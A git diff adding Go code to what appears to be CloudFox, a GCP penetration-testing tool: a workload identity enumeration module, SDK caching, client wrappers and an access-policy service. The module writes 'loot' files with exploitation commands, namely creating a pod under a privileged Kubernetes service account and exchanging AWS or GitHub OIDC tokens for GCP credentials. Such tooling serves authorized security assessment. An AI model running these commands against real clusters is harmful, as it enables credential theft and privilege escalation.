wib.IsHighPrivilege = isHighPrivilegeServiceAccount(sa) + + bindings = append(bindings, wib) + } + } + } + } + } + } + + return bindings +} + +// getServiceAccountPolicy gets IAM policy for a service account +func (m *WorkloadIdentityModule) getServiceAccountPolicy(ctx context.Context, saName string) ([]IAMService.PolicyBinding, error) { + iamSvc := IAMService.New() + + // Get the service account's IAM policy + // This requires calling the IAM API directly + // For now, we'll return the roles from the project-level bindings + return iamSvc.Policies(extractProjectFromSAName(saName), "project") +} + +// parseWorkloadIdentityMember parses a workload identity member string +// Format: serviceAccount:[PROJECT_ID].svc.id.goog[NAMESPACE/KSA_NAME] +func parseWorkloadIdentityMember(member string) (namespace, serviceAccount string) { + // Remove serviceAccount: prefix + member = strings.TrimPrefix(member, "serviceAccount:") + + // Find the workload pool and extract namespace/SA + // Format: PROJECT_ID.svc.id.goog[NAMESPACE/KSA_NAME] + bracketStart := strings.Index(member, "[") + bracketEnd := strings.Index(member, "]") + + if bracketStart == -1 || bracketEnd == -1 || bracketEnd <= bracketStart { + return "", "" + } + + nsAndSA := member[bracketStart+1 : bracketEnd] + parts := strings.Split(nsAndSA, "/") + if len(parts) == 2 { + return parts[0], parts[1] + } + + return "", "" +} + +// extractProjectFromSAName extracts project ID from service account name +func extractProjectFromSAName(saName string) string { + // Format: projects/PROJECT_ID/serviceAccounts/SA_EMAIL + parts := strings.Split(saName, "/") + if len(parts) >= 2 { + return parts[1] + } + return "" +} + +// isHighPrivilegeServiceAccount checks if a service account has high-privilege roles +func isHighPrivilegeServiceAccount(sa IAMService.ServiceAccountInfo) bool { + highPrivRoles := map[string]bool{ + "roles/owner": true, + "roles/editor": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/resourcemanager.projectIamAdmin": true, + "roles/compute.admin": true, + "roles/container.admin": true, + "roles/secretmanager.admin": true, + "roles/storage.admin": true, + } + + for _, role := range sa.Roles { + if highPrivRoles[role] { + return true + } + } + return false +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WorkloadIdentityModule) initializeLootFiles() { + m.LootMap["workloadidentity-commands"] = &internal.LootFile{ + Name: "workloadidentity-commands", + Contents: "# Workload Identity Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *WorkloadIdentityModule) addClusterToLoot(cwi ClusterWorkloadIdentity) { + if cwi.WorkloadPoolEnabled { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# GKE CLUSTER: %s\n"+ + "# ==========================================\n"+ + "# Location: %s\n"+ + "# Project: %s\n"+ + "# Workload Pool: %s\n"+ + "# Node Pools with WI: %d/%d\n"+ + "\n# Get cluster credentials:\n"+ + "gcloud container clusters get-credentials %s --zone=%s --project=%s\n\n", + cwi.ClusterName, + cwi.Location, + cwi.ProjectID, + cwi.WorkloadPool, + cwi.NodePoolsWithWI, + cwi.TotalNodePools, + cwi.ClusterName, + cwi.Location, + cwi.ProjectID, + ) + } +} + +func (m *WorkloadIdentityModule) addBindingToLoot(binding WorkloadIdentityBinding) { + highPriv := "" + if binding.IsHighPrivilege { + highPriv = " [HIGH PRIVILEGE]" + } + + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# K8s SA BINDING: %s/%s -> %s%s\n"+ + "# ------------------------------------------\n"+ + "# Cluster: %s (%s)\n"+ + "# Project: %s\n", + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + highPriv, + binding.ClusterName, + binding.ClusterLocation, + binding.ProjectID, + ) + + if binding.IsHighPrivilege && len(binding.GCPSARoles) > 0 { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# GCP SA Roles: %s\n", + strings.Join(binding.GCPSARoles, ", "), + ) + } + + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "\n# To exploit, create pod with this service account:\n"+ + "# kubectl run exploit-pod --image=google/cloud-sdk:slim --serviceaccount=%s -n %s -- sleep infinity\n"+ + "# kubectl exec -it exploit-pod -n %s -- gcloud auth list\n\n", + binding.KubernetesSA, + binding.KubernetesNS, + binding.KubernetesNS, + ) +} + +func (m *WorkloadIdentityModule) addPoolToLoot(pool workloadidentityservice.WorkloadIdentityPool) { + status := "Active" + if pool.Disabled { + status = "Disabled" + } + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# FEDERATION POOL: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# State: %s (%s)\n"+ + "# Description: %s\n"+ + "\n# Describe pool:\n"+ + "gcloud iam workload-identity-pools describe %s --location=global --project=%s\n\n"+ + "# List providers:\n"+ + "gcloud iam workload-identity-pools providers list --workload-identity-pool=%s --location=global --project=%s\n\n", + pool.PoolID, + pool.ProjectID, + pool.DisplayName, + pool.State, status, + pool.Description, + pool.PoolID, pool.ProjectID, + pool.PoolID, pool.ProjectID, + ) +} + +func (m *WorkloadIdentityModule) addProviderToLoot(provider workloadidentityservice.WorkloadIdentityProvider) { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PROVIDER: %s/%s (%s)\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n", + provider.PoolID, provider.ProviderID, + provider.ProviderType, + provider.ProjectID, + ) + + if provider.ProviderType == "AWS" { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# AWS Account: %s\n", provider.AWSAccountID) + } else if provider.ProviderType == "OIDC" { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# OIDC Issuer: %s\n", provider.OIDCIssuerURI) + } + + if provider.AttributeCondition != "" { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# Attribute Condition: %s\n", provider.AttributeCondition) + } else { + m.LootMap["workloadidentity-commands"].Contents += "# Attribute Condition: NONE\n" + } + + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "\n# Describe provider:\n"+ + "gcloud iam workload-identity-pools providers describe %s --workload-identity-pool=%s --location=global --project=%s\n\n", + provider.ProviderID, provider.PoolID, provider.ProjectID, + ) + + // Add exploitation guidance based on provider type + switch provider.ProviderType { + case "AWS": + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# From AWS account %s, exchange credentials:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --aws --output-file=gcp-creds.json\n\n", + provider.AWSAccountID, + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + case "OIDC": + if strings.Contains(provider.OIDCIssuerURI, "github") { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# From GitHub Actions workflow, add:\n"+ + "# permissions:\n"+ + "# id-token: write\n"+ + "# contents: read\n"+ + "# Then use:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n"+ + "# --output-file=gcp-creds.json\n\n", + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + } + } +} + +func (m *WorkloadIdentityModule) addFederatedBindingToLoot(binding workloadidentityservice.FederatedIdentityBinding) { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# FEDERATED BINDING\n"+ + "# ------------------------------------------\n"+ + "# Pool: %s\n"+ + "# GCP Service Account: %s\n"+ + "# External Subject: %s\n"+ + "# Project: %s\n\n", + binding.PoolID, + binding.GCPServiceAccount, + binding.ExternalSubject, + binding.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Clusters table + clustersHeader := []string{ + "Project Name", + "Project ID", + "Cluster", + "Location", + "WI Enabled", + "Workload Pool", + "Node Pools", + } + + var clustersBody [][]string + for _, cwi := range m.Clusters { + wiEnabled := "No" + if cwi.WorkloadPoolEnabled { + wiEnabled = "Yes" + } + workloadPool := "-" + if cwi.WorkloadPool != "" { + workloadPool = cwi.WorkloadPool + } + + clustersBody = append(clustersBody, []string{ + m.GetProjectName(cwi.ProjectID), + cwi.ProjectID, + cwi.ClusterName, + cwi.Location, + wiEnabled, + workloadPool, + fmt.Sprintf("%d/%d", cwi.NodePoolsWithWI, cwi.TotalNodePools), + }) + } + + // Bindings table + bindingsHeader := []string{ + "Project Name", + "Project ID", + "Cluster", + "K8s Namespace", + "K8s Service Account", + "GCP Service Account", + "High Priv", + } + + var bindingsBody [][]string + for _, binding := range m.Bindings { + highPriv := "No" + if binding.IsHighPrivilege { + highPriv = "Yes" + } + + bindingsBody = append(bindingsBody, []string{ + m.GetProjectName(binding.ProjectID), + binding.ProjectID, + binding.ClusterName, + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + highPriv, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "workload-identity-clusters", + Header: clustersHeader, + Body: clustersBody, + }, + } + + // Add bindings table if there are any + if len(bindingsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "workload-identity-bindings", + Header: bindingsHeader, + Body: bindingsBody, + }) + } + + // ============================ + // Workload Identity Federation tables + // ============================ + + // Federation Pools table + if len(m.Pools) > 0 { + poolsHeader := []string{ + "Project Name", + "Project ID", + "Pool ID", + "Display Name", + "State", + "Disabled", + } + + var poolsBody [][]string + for _, pool := range m.Pools { + disabled := "No" + if pool.Disabled { + disabled = "Yes" + } + poolsBody = append(poolsBody, []string{ + m.GetProjectName(pool.ProjectID), + pool.ProjectID, + pool.PoolID, + pool.DisplayName, + pool.State, + disabled, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "wi-federation-pools", + Header: poolsHeader, + Body: poolsBody, + }) + } + + // Federation Providers table + if len(m.Providers) > 0 { + providersHeader := []string{ + "Project Name", + "Project ID", + "Pool", + "Provider", + "Type", + "Issuer/Account", + "Attribute Condition", + } + + var providersBody [][]string + for _, p := range m.Providers { + issuerOrAccount := "-" + if p.ProviderType == "AWS" { + issuerOrAccount = p.AWSAccountID + } else if p.ProviderType == "OIDC" { + issuerOrAccount = p.OIDCIssuerURI + } + + attrCond := "-" + if p.AttributeCondition != "" { + attrCond = p.AttributeCondition + } + + providersBody = append(providersBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.PoolID, + p.ProviderID, + p.ProviderType, + issuerOrAccount, + attrCond, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "wi-federation-providers", + Header: providersHeader, + Body: providersBody, + }) + } + + // Federated bindings table + if len(m.FederatedBindings) > 0 { + fedBindingsHeader := []string{ + "Project Name", + "Project ID", + "Pool", + "GCP Service Account", + "External Subject", + } + + var fedBindingsBody [][]string + for _, fb := range m.FederatedBindings { + fedBindingsBody = append(fedBindingsBody, []string{ + m.GetProjectName(fb.ProjectID), + fb.ProjectID, + fb.PoolID, + fb.GCPServiceAccount, + fb.ExternalSubject, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "wi-federated-bindings", + Header: fedBindingsHeader, + Body: fedBindingsBody, + }) + } + + output := WorkloadIdentityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + "Could not write output") + } +} diff --git a/gcp/sdk/cache.go b/gcp/sdk/cache.go new file mode 100644 index 00000000..339525fa --- /dev/null +++ b/gcp/sdk/cache.go @@ -0,0 +1,60 @@ +package sdk + +import ( + "strings" + "time" + + "github.com/patrickmn/go-cache" +) + +// GCPSDKCache is the centralized cache for all GCP SDK calls +// Uses the same caching library as AWS and Azure (github.com/patrickmn/go-cache) +// Default expiration: 2 hours, cleanup interval: 10 minutes +var GCPSDKCache = cache.New(2*time.Hour, 10*time.Minute) + +// CacheKey generates a consistent cache key from components +// Example: CacheKey("buckets", "my-project") -> "buckets-my-project" +func CacheKey(parts ...string) string { + return strings.Join(parts, "-") +} + +// ClearCache clears all entries from the cache +func ClearCache() { + GCPSDKCache.Flush() +} + +// CacheStats returns cache statistics +type CacheStats struct { + ItemCount int + Hits uint64 + Misses uint64 +} + +// GetCacheStats returns current cache statistics +func GetCacheStats() CacheStats { + return CacheStats{ + ItemCount: GCPSDKCache.ItemCount(), + // Note: go-cache doesn't track hits/misses directly + // These would need custom implementation if needed + } +} + +// SetCacheExpiration sets a custom expiration for an item +func SetCacheExpiration(key string, value interface{}, expiration time.Duration) { + GCPSDKCache.Set(key, value, expiration) +} + +// GetFromCache retrieves an item from cache +func GetFromCache(key string) (interface{}, bool) { + return GCPSDKCache.Get(key) +} + +// SetInCache stores an item in cache with default expiration +func SetInCache(key string, value interface{}) { + GCPSDKCache.Set(key, value, 0) // 0 = use default expiration +} + +// DeleteFromCache removes an item from cache +func DeleteFromCache(key string) { + GCPSDKCache.Delete(key) +} diff --git a/gcp/sdk/clients.go b/gcp/sdk/clients.go new file mode 100644 index 00000000..2137ebb5 --- /dev/null +++ b/gcp/sdk/clients.go @@ -0,0 +1,185 @@ +package sdk + +import ( + "context" + "fmt" + + "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + artifactregistry "google.golang.org/api/artifactregistry/v1" + bigquery "google.golang.org/api/bigquery/v2" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + iam "google.golang.org/api/iam/v1" + run "google.golang.org/api/run/v1" + secretmanager "google.golang.org/api/secretmanager/v1" +) + +// GetStorageClient returns a Cloud Storage client +func GetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + client, err := storage.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create storage client: %w", err) + } + return client, nil +} + +// GetComputeService returns a Compute Engine service +func GetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + service, err := compute.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %w", err) + } + return service, nil +} + +// GetIAMService returns an IAM Admin service +func GetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + service, err := iam.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %w", err) + } + return service, nil +} + +// GetResourceManagerService returns a Cloud Resource Manager service +func GetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + service, err := cloudresourcemanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create resource manager service: %w", err) + } + return service, nil +} + +// GetSecretManagerService returns a Secret Manager service +func GetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanager.Service, error) { + service, err := secretmanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create secret manager service: %w", err) + } + return service, nil +} + +// GetBigQueryService returns a BigQuery service +func GetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigquery.Service, error) { + service, err := bigquery.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BigQuery service: %w", err) + } + return service, nil +} + +// GetArtifactRegistryService returns an Artifact Registry service +func GetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Service, error) { + service, err := artifactregistry.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Artifact Registry service: %w", err) + } + return service, nil +} + +// GetContainerService returns a GKE Container service +func GetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { + service, err := container.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create container service: %w", err) + } + return service, nil +} + +// GetCloudRunService returns a Cloud Run service +func GetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) (*run.APIService, error) { + service, err := run.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run service: %w", err) + } + return service, nil +} + +// ------------------------- CACHED CLIENT WRAPPERS ------------------------- + +// CachedGetStorageClient returns a cached Storage client +func CachedGetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + cacheKey := CacheKey("client", "storage") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*storage.Client), nil + } + + client, err := GetStorageClient(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetComputeService returns a cached Compute Engine service +func CachedGetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + cacheKey := CacheKey("client", "compute") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*compute.Service), nil + } + + service, err := GetComputeService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetIAMService returns a cached IAM service +func CachedGetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + cacheKey := CacheKey("client", "iam") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*iam.Service), nil + } + + service, err := GetIAMService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetResourceManagerService returns a cached Resource Manager service +func CachedGetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + cacheKey := CacheKey("client", "resourcemanager") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudresourcemanager.Service), nil + } + + service, err := GetResourceManagerService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSecretManagerService returns a cached Secret Manager service +func CachedGetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanager.Service, error) { + cacheKey := CacheKey("client", "secretmanager") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*secretmanager.Service), nil + } + + service, err := GetSecretManagerService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} diff --git a/gcp/sdk/interfaces.go b/gcp/sdk/interfaces.go new file mode 100644 index 00000000..9206bc87 --- /dev/null +++ b/gcp/sdk/interfaces.go @@ -0,0 +1,138 @@ +package sdk + +import ( + "context" + + "cloud.google.com/go/iam" + "cloud.google.com/go/storage" + compute "google.golang.org/api/compute/v1" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + cloudresourcemanagerv2 "google.golang.org/api/cloudresourcemanager/v2" + secretmanager "google.golang.org/api/secretmanager/v1" + iam_admin "google.golang.org/api/iam/v1" +) + +// StorageClientInterface defines the interface for Cloud Storage operations +type StorageClientInterface interface { + Buckets(ctx context.Context, projectID string) *storage.BucketIterator + Bucket(name string) *storage.BucketHandle + Close() error +} + +// StorageBucketInterface defines the interface for bucket operations +type StorageBucketInterface interface { + Attrs(ctx context.Context) (*storage.BucketAttrs, error) + IAM() *iam.Handle + Object(name string) *storage.ObjectHandle + Objects(ctx context.Context, q *storage.Query) *storage.ObjectIterator +} + +// ComputeServiceInterface defines the interface for Compute Engine operations +type ComputeServiceInterface interface { + // Instances + ListInstances(ctx context.Context, projectID, zone string) (*compute.InstanceList, error) + AggregatedListInstances(ctx context.Context, projectID string) (*compute.InstanceAggregatedList, error) + GetInstance(ctx context.Context, projectID, zone, instanceName string) (*compute.Instance, error) + + // Networks + ListNetworks(ctx context.Context, projectID string) (*compute.NetworkList, error) + GetNetwork(ctx context.Context, projectID, networkName string) (*compute.Network, error) + + // Firewalls + ListFirewalls(ctx context.Context, projectID string) (*compute.FirewallList, error) + + // Zones + ListZones(ctx context.Context, projectID string) (*compute.ZoneList, error) +} + +// IAMServiceInterface defines the interface for IAM operations +type IAMServiceInterface interface { + // Service Accounts + ListServiceAccounts(ctx context.Context, projectID string) ([]*iam_admin.ServiceAccount, error) + GetServiceAccount(ctx context.Context, name string) (*iam_admin.ServiceAccount, error) + ListServiceAccountKeys(ctx context.Context, name string) ([]*iam_admin.ServiceAccountKey, error) + + // Roles + ListRoles(ctx context.Context, projectID string) ([]*iam_admin.Role, error) + GetRole(ctx context.Context, name string) (*iam_admin.Role, error) +} + +// ResourceManagerServiceInterface defines the interface for Cloud Resource Manager operations +type ResourceManagerServiceInterface interface { + // Projects + ListProjects(ctx context.Context) ([]*cloudresourcemanager.Project, error) + GetProject(ctx context.Context, projectID string) (*cloudresourcemanager.Project, error) + GetProjectIAMPolicy(ctx context.Context, projectID string) (*cloudresourcemanager.Policy, error) + + // Organizations + ListOrganizations(ctx context.Context) ([]*cloudresourcemanager.Organization, error) + GetOrganization(ctx context.Context, name string) (*cloudresourcemanager.Organization, error) + GetOrganizationIAMPolicy(ctx context.Context, resource string) (*cloudresourcemanager.Policy, error) + + // Folders + ListFolders(ctx context.Context, parent string) ([]*cloudresourcemanagerv2.Folder, error) +} + +// SecretManagerServiceInterface defines the interface for Secret Manager operations +type SecretManagerServiceInterface interface { + // Secrets + ListSecrets(ctx context.Context, projectID string) ([]*secretmanager.Secret, error) + GetSecret(ctx context.Context, name string) (*secretmanager.Secret, error) + ListSecretVersions(ctx context.Context, secretName string) ([]*secretmanager.SecretVersion, error) + AccessSecretVersion(ctx context.Context, name string) (*secretmanager.AccessSecretVersionResponse, error) +} + +// BigQueryServiceInterface defines the interface for BigQuery operations +type BigQueryServiceInterface interface { + ListDatasets(ctx context.Context, projectID string) ([]string, error) + ListTables(ctx context.Context, projectID, datasetID string) ([]string, error) + GetDatasetIAMPolicy(ctx context.Context, projectID, datasetID string) (interface{}, error) + GetTableIAMPolicy(ctx context.Context, projectID, datasetID, tableID string) (interface{}, error) +} + +// ArtifactRegistryServiceInterface defines the interface for Artifact Registry operations +type ArtifactRegistryServiceInterface interface { + ListRepositories(ctx context.Context, projectID, location string) ([]interface{}, error) + GetRepository(ctx context.Context, name string) (interface{}, error) + ListDockerImages(ctx context.Context, parent string) ([]interface{}, error) +} + +// CloudFunctionsServiceInterface defines the interface for Cloud Functions operations +type CloudFunctionsServiceInterface interface { + ListFunctions(ctx context.Context, projectID, location string) ([]interface{}, error) + GetFunction(ctx context.Context, name string) (interface{}, error) + GetFunctionIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// CloudRunServiceInterface defines the interface for Cloud Run operations +type CloudRunServiceInterface interface { + ListServices(ctx context.Context, projectID, location string) ([]interface{}, error) + GetService(ctx context.Context, name string) (interface{}, error) + GetServiceIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// GKEServiceInterface defines the interface for GKE operations +type GKEServiceInterface interface { + ListClusters(ctx context.Context, projectID, location string) ([]interface{}, error) + GetCluster(ctx context.Context, name string) (interface{}, error) +} + +// PubSubServiceInterface defines the interface for Pub/Sub operations +type PubSubServiceInterface interface { + ListTopics(ctx context.Context, projectID string) ([]interface{}, error) + ListSubscriptions(ctx context.Context, projectID string) ([]interface{}, error) + GetTopicIAMPolicy(ctx context.Context, topic string) (interface{}, error) +} + +// KMSServiceInterface defines the interface for KMS operations +type KMSServiceInterface interface { + ListKeyRings(ctx context.Context, projectID, location string) ([]interface{}, error) + ListCryptoKeys(ctx context.Context, keyRing string) ([]interface{}, error) + GetCryptoKeyIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// LoggingServiceInterface defines the interface for Cloud Logging operations +type LoggingServiceInterface interface { + ListSinks(ctx context.Context, parent string) ([]interface{}, error) + ListMetrics(ctx context.Context, parent string) ([]interface{}, error) +} diff --git a/gcp/services/accessPolicyService/accessPolicyService.go b/gcp/services/accessPolicyService/accessPolicyService.go new file mode 100644 index 00000000..94679471 --- /dev/null +++ b/gcp/services/accessPolicyService/accessPolicyService.go @@ -0,0 +1,282 @@ +package accesspolicyservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" +) + +type AccessPolicyService struct { + session *gcpinternal.SafeSession +} + +func New() *AccessPolicyService { + return &AccessPolicyService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AccessPolicyService { + return &AccessPolicyService{session: session} +} + +// AccessLevelInfo represents an access level (conditional access policy) +type AccessLevelInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + PolicyName string `json:"policyName"` + + // Basic level conditions + CombiningFunction string `json:"combiningFunction"` // AND or OR + Conditions []ConditionInfo `json:"conditions"` + + // Custom level + HasCustomLevel bool `json:"hasCustomLevel"` + CustomExpression string `json:"customExpression"` + + // Analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ConditionInfo represents a condition in an access level +type ConditionInfo struct { + IPSubnetworks []string `json:"ipSubnetworks"` + DevicePolicy *DevicePolicyInfo `json:"devicePolicy"` + RequiredAccessLevels []string `json:"requiredAccessLevels"` + Negate bool `json:"negate"` + Members []string `json:"members"` + Regions []string `json:"regions"` +} + +// DevicePolicyInfo represents device policy requirements +type DevicePolicyInfo struct { + RequireScreenLock bool `json:"requireScreenLock"` + RequireAdminApproval bool `json:"requireAdminApproval"` + RequireCorpOwned bool `json:"requireCorpOwned"` + AllowedEncryption []string `json:"allowedEncryptionStatuses"` + AllowedDeviceMgmt []string `json:"allowedDeviceManagementLevels"` + OSConstraints []string `json:"osConstraints"` +} + +// GCIPSettingsInfo represents Google Cloud Identity Platform settings +type GCIPSettingsInfo struct { + TenantIDs []string `json:"tenantIds"` + LoginPageURI string `json:"loginPageUri"` +} + +// ListAccessLevels retrieves all access levels for an organization's policy +func (s *AccessPolicyService) ListAccessLevels(orgID string) ([]AccessLevelInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var allLevels []AccessLevelInfo + + // First, get access policies for the org + parent := fmt.Sprintf("organizations/%s", orgID) + policiesReq := service.AccessPolicies.List().Parent(parent) + err = policiesReq.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error { + for _, policy := range page.AccessPolicies { + policyName := extractPolicyName(policy.Name) + + // Get access levels for this policy + levelsParent := fmt.Sprintf("accessPolicies/%s", policyName) + levelsReq := service.AccessPolicies.AccessLevels.List(levelsParent) + levelsReq.Pages(ctx, func(levelsPage *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range levelsPage.AccessLevels { + info := s.parseAccessLevel(level, policyName) + allLevels = append(allLevels, info) + } + return nil + }) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return allLevels, nil +} + +// ListAccessLevelsForPolicy retrieves access levels for a specific policy +func (s *AccessPolicyService) ListAccessLevelsForPolicy(policyName string) ([]AccessLevelInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var levels []AccessLevelInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.AccessLevels.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return levels, nil +} + +func (s *AccessPolicyService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + Description: level.Description, + PolicyName: policyName, + RiskReasons: []string{}, + } + + // Parse basic level + if level.Basic != nil { + info.CombiningFunction = level.Basic.CombiningFunction + + for _, condition := range level.Basic.Conditions { + condInfo := ConditionInfo{ + IPSubnetworks: condition.IpSubnetworks, + Negate: condition.Negate, + Members: condition.Members, + Regions: condition.Regions, + } + + for _, reqLevel := range condition.RequiredAccessLevels { + condInfo.RequiredAccessLevels = append(condInfo.RequiredAccessLevels, extractLevelName(reqLevel)) + } + + // Parse device policy + if condition.DevicePolicy != nil { + dp := condition.DevicePolicy + condInfo.DevicePolicy = &DevicePolicyInfo{ + RequireScreenLock: dp.RequireScreenlock, + RequireAdminApproval: dp.RequireAdminApproval, + RequireCorpOwned: dp.RequireCorpOwned, + AllowedEncryption: dp.AllowedEncryptionStatuses, + AllowedDeviceMgmt: dp.AllowedDeviceManagementLevels, + } + + for _, os := range 